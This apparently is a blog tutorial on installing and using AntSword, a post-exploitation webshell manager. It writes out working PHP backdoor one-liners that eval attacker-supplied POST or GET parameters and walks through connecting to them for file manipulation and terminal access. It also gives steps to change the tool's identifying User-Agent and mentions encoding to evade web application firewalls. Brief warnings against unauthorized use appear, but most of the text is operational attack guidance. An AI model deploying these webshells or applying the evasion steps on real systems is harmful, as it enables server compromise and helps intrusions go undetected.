AntSword is an very easy to use tool for pentesters, security groups as a Post Exploitation tool it can also be used for webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purpose. It can be a better alternative to Weevely
Description from Official website
AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.
1.1 Download correct file/zip file
The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader
It can be used on Microsoft Windows, Linux and macOS platforms.
1.2 Install or unzip content
Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”
1.3 Launch “AntSword.exe”
1.4 Click on “Initialize” button
1.5 Select a working directory
In this example, we create a “working-dir” working directory under main directory which is “C:\Users\win10\Desktop\as-4.0.3\working-dir”
Select the folder, then click on “Select folder” button
It will start to download necessary package (Which is “antSword-master.zip”)
(You might encounter following error)
Unzip Error Code: [object Object]
If you have encountered this error follow 1.5.1
1.5.1 Fix the error
Open the working directory we have just selected, a folder with name “antSword-master” and a zip file with name “antSword-master.zip” may appear there, delete them.
1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.
We should be able to see following screen
When it’s done
Then, this Window will disappear, the program will terminate by itself.
1.6 Now we can launch the “AntSword.exe” again, it is now ready to be used
2 Simple usage Demonstration
First, we need to deploy a webshell/Sometimes… so called backdoor/Trojan
In this example we are going to use PHP
2.1 Create a php file “test.php”
2.2 Save following content to “test.php” file
<?php eval($_POST['mytestshell']); ?>
2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)
2.4 Right click on blank space, click on “Add”
2.5 Enter correct server details
Shell url: Your test.php path
Shell pwd: Shell password which is the content behind $_POST, “mytestshell” in this case
Shell type: PHP
2.6 Click on “Add” button
2.5 Now it will appear under “Shell Lists”
2.6 Double click on the item, we can now see all files on the server (As long as the user who is running the server process has corresponding privileges)
We can even upload, download files to/from selected folder/file, create, modify, delete files and folders, even open Terminal
It also supports other Shell types besides PHP
Send customized HTTP Header/Body value
Proxy, Plugin Store, Encoder etc.
AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html
Bonus 1 – Use AntSword with PHP get request
Wonder how to use AntSword with $_GET rather than $_POST in PHP?
Here is how
The PHP file
<?php eval($_POST['mytestshell']); ?>
<?php eval($_GET['mytestshell']); ?>
The Settings in AntSword
Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST[‘mypswd’]);
Shell pwd: mypswd
Bonus 2 – Modify User-Agents
By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as user agent when updating the webshell information or connecting the webshell. Which can be recognized by WAF or human easily.
To change User-Agent for AntSword.
There are 2 files and 3 places we need to modify
b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”
Note: “working-dir” was created during Step 1.5
b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”
b2.1.3 Change “antSword/v2.1” to what ever you like, then save the file
b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”
b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”
b2.2.3 Change “antSword/v2.0” to what ever you like, then save the file
Bonus 3 – Latest User-Agents
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0
Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0
Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0
Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15
IE 11/Internet Explorer 11 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Edge on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evading Web Application Firewall (WAF), plugins, Multipart payload etc.
Warning: Do not use or test this tool on unauthorised servers.